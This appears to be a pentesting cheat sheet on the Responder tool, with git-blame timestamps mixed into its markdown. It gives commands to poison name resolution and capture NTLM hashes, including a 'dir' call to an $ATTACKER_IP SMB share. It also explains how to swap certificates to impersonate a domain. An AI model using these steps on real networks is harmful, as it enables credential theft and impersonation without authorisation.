2022-11-13 22:38:01 +01:00
# Responder
* [lgandx's repo ](https://github.com/lgandx/Responder.git )
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication
## Usage
2023-03-25 15:31:51 +01:00
### Grab NTLM Token
* Setup responder
2022-11-13 22:38:01 +01:00
```sh
responder -I tun0 -wrvd
```
2023-03-25 15:31:51 +01:00
* Open an Shell on the windows target and request the attacker's SMB a.k.a responder
```sh
dir \\$ATTACKER_IP\C$
```
### Impersonate Domain -- Change Responder's certificates
* After using nsupdate to add the attacker as a subdomain do the following tasks
* Add a certificate and its private key to
```sh
/usr/share/responder/certs
```
* Edit `Responder.conf`
```
[HTTPS Server]
; Configure SSL Certificates to use
SSLCert = certs/cert.pem
SSLKey = certs/key.pem
```
* Start responder
```sh
responder -I < interface >
```
